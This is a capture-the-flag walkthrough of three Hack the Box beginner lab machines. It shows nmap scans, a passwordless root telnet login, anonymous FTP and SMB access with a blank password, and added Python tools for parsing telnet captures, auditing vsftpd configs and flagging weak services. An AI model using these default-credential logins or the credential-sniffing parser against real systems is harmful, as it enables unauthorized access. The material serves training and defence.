Starting Point on Hack the Box (HTB) is broken down into three tiers. The first tier gets the user familiar with the HTB interface, with common terminology, and with the pen testing mindset. Below is a short writeup for the first three tier 0 boxes.
Meow
Initial Recon
Ran a quick nmap scan against the box.
┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ nmap -sC -sV $tgt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-15 23:25 CDT
Nmap scan report for 10.129.81.56
Host is up (0.049s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.12 seconds
Looking at the results shows a single port open – telnet on port 23.
Initial Access
Telnet
What is telnet? It is an application-layer protocol that provides remote access to a host, similar to Secure Shell (SSH), which is commonly seen on port 22. The main difference between the two is that telnet traffic is sent in clear text while SSH traffic is encrypted.
Telnet can be accessed using the telnet command. The only required argument is the remote system's IP. Once connected, the remote host asks for a username. With a few guesses I find one that works and it happens to be root. Once authenticated, simply list the available files and there is flag.txt, easy enough!
┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ telnet $tgt
Trying 10.129.81.56...
Connected to 10.129.81.56.
Escape character is '^]'.
█ █ ▐▌ ▄█▄ █ ▄▄▄▄
█▄▄█ ▀▀█ █▀▀ ▐▌▄▀ █ █▀█ █▀█ █▌▄█ ▄▀▀▄ ▀▄▀
█ █ █▄█ █▄▄ ▐█▀▄ █ █ █ █▄▄ █▌▄█ ▀▄▄▀ █▀█
Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 16 May 2022 04:30:05 AM UTC
System load: 0.0
Usage of /: 41.7% of 7.75GB
Memory usage: 4%
Swap usage: 0%
Processes: 138
Users logged in: 0
IPv4 address for eth0: 10.129.81.56
IPv6 address for eth0: dead:beef::250:56ff:feb9:ed8e
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon May 16 04:26:31 UTC 2022 on pts/0
root@Meow:~# ls -la
total 36
drwx------ 5 root root 4096 Jun 18 2021 .
drwxr-xr-x 20 root root 4096 Jul 7 2021 ..
lrwxrwxrwx 1 root root 9 Jun 4 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3132 Oct 6 2020 .bashrc
drwx------ 2 root root 4096 Apr 21 2021 .cache
-rw-r--r-- 1 root root 33 Jun 17 2021 flag.txt
drwxr-xr-x 3 root root 4096 Apr 21 2021 .local
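The clear-text point above is worth seeing in bytes. The following is an added example, not code from the original writeup: it strips telnet's option negotiation (the IAC sequences a sensor sees on port 23) and reconstructs what the session exposed, which is exactly why a network monitor or IDS can recover telnet logins while an SSH session yields nothing. The two captures are constructed to resemble the Meow login and a host that does prompt for a password; the negotiation bytes are representative, not taken from a real capture.

```python
"""Reconstruct a telnet session from raw TCP payload bytes.

Added example, not code from the original writeup.  The packet payloads
below are constructed; the option negotiation is representative only.
"""

# Telnet command bytes (RFC 854).
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240
# Option codes used in the constructed negotiation (RFC 857, 858, 1091, 1572).
ECHO, SUPPRESS_GO_AHEAD, TERMINAL_TYPE, NEW_ENVIRON = 1, 3, 24, 39


def strip_telnet_negotiation(payload: bytes) -> bytes:
    """Drop IAC command sequences and return only the user-visible data."""
    out = bytearray()
    i, n = 0, len(payload)
    while i < n:
        byte = payload[i]
        if byte != IAC:
            out.append(byte)
            i += 1
            continue
        if i + 1 >= n:          # IAC as the final byte: truncated command
            break
        cmd = payload[i + 1]
        if cmd == IAC:           # IAC IAC escapes a literal 0xFF data byte
            out.append(IAC)
            i += 2
        elif cmd in (WILL, WONT, DO, DONT):
            i += 3               # IAC <cmd> <option>
        elif cmd == SB:          # sub-negotiation runs until IAC SE
            end = payload.find(bytes([IAC, SE]), i + 2)
            i = n if end == -1 else end + 2
        else:
            i += 2               # other commands (NOP, GA, AYT, ...) are two bytes
    return bytes(out)


def extract_session(segments):
    """Walk (direction, payload) TCP segments in order and return what the
    clear-text session exposed.  direction is "srv" (server to client) or
    "cli" (client to server).  Keystrokes may arrive one per segment, so
    client data is buffered until a newline is seen."""
    found = {"username": None, "password": None, "commands": []}
    expecting = None     # meaning of the next client line, judged from the last prompt
    typed = ""
    for direction, raw in segments:
        text = strip_telnet_negotiation(raw).decode("latin-1")
        if direction == "srv":
            prompt = text.rstrip()
            if prompt.endswith("login:"):
                expecting = "username"
            elif prompt.endswith("Password:"):
                expecting = "password"
            elif prompt.endswith(("#", "$", ">")):
                expecting = "command"
            continue
        typed += text
        if "\n" not in typed:
            continue
        line, _, typed = typed.partition("\n")
        line = line.rstrip("\r")
        if expecting == "username":
            found["username"] = line
        elif expecting == "password":
            found["password"] = line
        elif expecting == "command":
            found["commands"].append(line)
        expecting = None
    return found


# Constructed capture of a Meow-style login: negotiation, then "root", no password.
MEOW_CAPTURE = [
    ("srv", bytes([IAC, DO, TERMINAL_TYPE, IAC, DO, NEW_ENVIRON])),
    ("cli", bytes([IAC, WONT, TERMINAL_TYPE, IAC, WONT, NEW_ENVIRON])),
    ("srv", bytes([IAC, WILL, ECHO, IAC, WILL, SUPPRESS_GO_AHEAD]) + b"\r\nMeow login: "),
    ("cli", b"r"), ("cli", b"o"), ("cli", b"o"), ("cli", b"t"), ("cli", b"\r\n"),
    ("srv", b"Welcome to Ubuntu 20.04.2 LTS\r\nLast login: Mon May 16 04:26:31 UTC 2022 on pts/0\r\nroot@Meow:~# "),
    ("cli", b"ls -la\r\n"),
]

# Constructed capture of a host that does ask for a password: it is just as visible.
PASSWORD_CAPTURE = [
    ("srv", bytes([IAC, SB, TERMINAL_TYPE, 1, IAC, SE]) + b"login: "),
    ("cli", b"alice\r\n"),
    ("srv", b"Password: "),
    ("cli", b"example-pass-123\r\n"),
    ("srv", b"Last login: Fri\r\n$ "),
    ("cli", b"id\r\n"),
]

if __name__ == "__main__":
    print(extract_session(MEOW_CAPTURE))
    print(extract_session(PASSWORD_CAPTURE))
```

For the Meow-style capture the result is a root login with no password and the `ls -la` that followed; for the second capture the password comes back verbatim. The same walk over an SSH capture would yield only the key exchange and encrypted records, which is the whole argument for retiring telnet or at least alerting on port 23 logins.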
Fawn
Initial Recon
Ran a quick nmap scan.
┌──(crimson㉿crimson)-[~/HTB/Starting Point/Fawn]
└─$ nmap -sC -sV $tgt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-15 23:40 CDT
Nmap scan report for 10.129.1.14
Host is up (0.061s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.2
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.17 seconds
Looking at the results shows a single port open – File Transfer Protocol (FTP) on port 21.
Initial Access
FTP
What is FTP? It is a protocol that facilitates the transfer of files between a client and a server.
To connect to the FTP server simply use the ftp command. The only required argument is the remote system's IP. Looking at our nmap scan shows that anonymous FTP login is allowed, so I do just that. The username is anonymous and for the password press ENTER. After listing the files in the current directory I see flag.txt. Using the get command I can pull that file down from the FTP server to my attacking box. From there simply cat the file.
┌──(crimson㉿crimson)-[~/HTB/Starting Point/Fawn]
└─$ ftp $tgt
Connected to 10.129.1.14.
220 (vsFTPd 3.0.3)
Name (10.129.1.14:crimson): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||50222|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||49255|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |**********************************************************************| 32 21.64 KiB/s 00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.63 KiB/s)
ftp> exit
221 Goodbye.
┌──(crimson㉿crimson)-[~/HTB/Starting Point/Fawn]
└─$ ll
total 4
-rw-r--r-- 1 crimson crimson 32 Jun 3 2021 flag.txt
┌──(crimson㉿crimson)-[~/HTB/Starting Point/Fawn]
└─$
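Fawn's weakness is a server-side setting, so the defender's check is on the configuration rather than the network. The following is an added example, not code from the original writeup: it parses a vsftpd configuration and reports the directives that produce exactly what nmap reported above (anonymous login allowed, control connection in plain text), with a weak config beside a hardened one. Both config texts are constructed and are not Fawn's real /etc/vsftpd.conf; the defaults used for absent directives are the ones documented in vsftpd.conf(5).

```python
"""Audit a vsftpd configuration for the settings that let a flag be read
anonymously over a plain-text channel.  Added example, not from the original
writeup; the config texts below are constructed.
"""

# directive -> (default when absent, value that is a finding, why it matters)
CHECKS = {
    "anonymous_enable": ("YES", "YES", "anonymous login allowed; this is what nmap's ftp-anon script reported"),
    "anon_upload_enable": ("NO", "YES", "anonymous users may upload files"),
    "anon_mkdir_write_enable": ("NO", "YES", "anonymous users may create directories"),
    "write_enable": ("NO", "YES", "write commands such as STOR and DELE are enabled"),
    "ssl_enable": ("NO", "NO", "control and data channels are plain text, as the ftp-syst output showed"),
}


def parse_vsftpd_conf(text: str) -> dict:
    """Parse option=value lines; blank lines and '#' comments are ignored."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def audit_vsftpd(text: str) -> list:
    """Return (directive, effective_value, message) for every weak setting,
    taking vsftpd's documented default when a directive is absent."""
    conf = parse_vsftpd_conf(text)
    findings = []
    for directive, (default, bad_value, message) in CHECKS.items():
        effective = conf.get(directive, default).upper()
        if effective == bad_value:
            findings.append((directive, effective, message))
    return findings


# Constructed config in the shape that produces Fawn's behaviour: anonymous
# read access over a plain-text channel (ssl_enable is simply absent).
WEAK_CONF = """
# constructed example - not a real server's file
listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=NO
"""

# Constructed hardened config: no anonymous access, TLS required for logins.
HARDENED_CONF = """
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=NO
ssl_enable=YES
force_local_logins_ssl=YES
force_local_data_ssl=YES
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_vsftpd(conf))
```

The weak config yields two findings (anonymous_enable and the absent ssl_enable, which falls back to its default of NO); the hardened one yields none. An empty file is treated the same way as the weak one for anonymous access, because anonymous_enable defaults to YES, which is the trap an administrator who only comments out lines walks into.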
Dancing
Initial Recon
Started with an nmap scan.
┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ nmap -sC -sV $tgt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-15 23:46 CDT
Nmap scan report for 10.129.1.12
Host is up (0.053s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-05-16T08:46:44
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: 4h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.43 seconds
There are a few open ports – Microsoft Remote Procedure Call (RPC) on 135, NetBIOS on port 139, and Server Message Block (SMB) on port 445.
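Each of the three recon sections above reads the nmap output by eye. The following is an added example, not code from the original writeup, that does the reading programmatically for all three: it parses nmap's normal output (ports, versions and NSE script lines) and flags the telnet service from Meow, the anonymous and plain-text FTP from Fawn, and the SMB signing result from Dancing. The scan texts are trimmed copies of the output shown in this writeup; the parser only handles the `-sC -sV` normal-output layout shown here, not nmap's XML.

```python
"""Parse nmap -sC -sV normal output and flag the weaknesses the three scans
exposed.  Added example, not from the original writeup; the scan texts are
trimmed copies of the writeup's own output.
"""
import re

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")


def parse_nmap(text: str) -> dict:
    """Return {"host", "ports": [...], "host_scripts": [...]}.  NSE script lines
    (those starting with '|') attach to the port above them, or to the host
    once 'Host script results:' has been seen."""
    result = {"host": None, "ports": [], "host_scripts": []}
    current, in_host_scripts = None, False
    for raw in text.splitlines():
        line = raw.rstrip()
        m = HOST_RE.match(line)
        if m:
            result["host"] = m.group(1)
            continue
        if line.startswith("Host script results:"):
            in_host_scripts, current = True, None
            continue
        m = PORT_RE.match(line)
        if m:
            in_host_scripts = False
            current = {"port": int(m.group(1)), "proto": m.group(2),
                       "state": m.group(3), "service": m.group(4),
                       "version": m.group(5).strip(), "scripts": []}
            result["ports"].append(current)
            continue
        if line.startswith("|"):
            script_line = line.lstrip("|_ ")   # drop nmap's tree prefix
            if in_host_scripts:
                result["host_scripts"].append(script_line)
            elif current is not None:
                current["scripts"].append(script_line)
    return result


def findings(text: str) -> list:
    """Return (host, location, message) tuples for the weaknesses of interest."""
    scan = parse_nmap(text)
    out = []
    for p in scan["ports"]:
        if p["state"] != "open":
            continue
        where = f"{p['port']}/{p['proto']}"
        if p["service"] == "telnet":
            out.append((scan["host"], where, "telnet: logins and sessions cross the network in clear text"))
        if p["service"] == "ftp":
            if any(s.startswith("ftp-anon:") and "login allowed" in s for s in p["scripts"]):
                out.append((scan["host"], where, "ftp: anonymous login allowed"))
            if any("Control connection is plain text" in s for s in p["scripts"]):
                out.append((scan["host"], where, "ftp: control channel is plain text (from ftp-syst)"))
    for s in scan["host_scripts"]:
        if s.startswith("Message signing") and "not required" in s:
            out.append((scan["host"], "smb2-security-mode", "smb: signing enabled but not required"))
    return out


# Trimmed copies of the three scans from the writeup.
MEOW_SCAN = """\
Nmap scan report for 10.129.81.56
Host is up (0.049s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

FAWN_SCAN = """\
Nmap scan report for 10.129.1.14
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Logged in as ftp
|      Control connection is plain text
|      Data connections will be plain text
|_End of status
Service Info: OS: Unix
"""

DANCING_SCAN = """\
Nmap scan report for 10.129.1.12
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
|_clock-skew: 4h00m00s
"""

if __name__ == "__main__":
    for scan in (MEOW_SCAN, FAWN_SCAN, DANCING_SCAN):
        for f in findings(scan):
            print(*f, sep="  ")
```

Run over the three scans it produces one finding for Meow, two for Fawn and one for Dancing. The SMB signing check is the one worth keeping in a real inventory script: "enabled but not required" is the default for non-domain-controller Windows hosts and is what makes SMB relay possible, so it is a useful per-host hardening flag alongside the plain-text services.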
Initial Access
SMB
What is SMB? It is a communication protocol created by Microsoft that facilitates shared access to files between hosts. For example, a server can have a share with files that other clients on the network can access remotely.
To list shares on a remote system from Kali Linux, use the smbclient command. In this scenario -U is used to specify a username, -N forces no password to be used, and -L gets a list of available shares from the specified host. After trying common usernames and passwords I came across valid credentials: the username admin with no password.
┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ smbclient -U 'admin' -N -L \\$tgt
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.1.12 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
The first three shares listed are common Windows shares. The last, WorkShares, is not. Using smbclient I can also access shares. To access a remote share I must provide valid credentials and the share name.
After successfully connecting, I can use the dir command to list files. Eventually I find flag.txt. To pull that file from the SMB share to my local attacking box I use the get command. Once it is downloaded I can cat the file on my local system.
┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ smbclient -U 'admin' -N \\\\$tgt\\WorkShares
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Mar 29 03:22:01 2021
.. D 0 Mon Mar 29 03:22:01 2021
Amy.J D 0 Mon Mar 29 04:08:24 2021
James.P D 0 Thu Jun 3 03:38:03 2021
5114111 blocks of size 4096. 1732437 blocks available
smb: \> dir Amy.J\
. D 0 Mon Mar 29 04:08:24 2021
.. D 0 Mon Mar 29 04:08:24 2021
worknotes.txt A 94 Fri Mar 26 06:00:37 2021
5114111 blocks of size 4096. 1732055 blocks available
smb: \> get Amy.J\worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as Amy.J\worknotes.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> dir James.P\
. D 0 Thu Jun 3 03:38:03 2021
.. D 0 Thu Jun 3 03:38:03 2021
flag.txt A 32 Mon Mar 29 04:26:57 2021
5114111 blocks of size 4096. 1732026 blocks available
smb: \> get James.P\flag.txt
getting file \James.P\flag.txt of size 32 as James.P\flag.txt (0.1 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit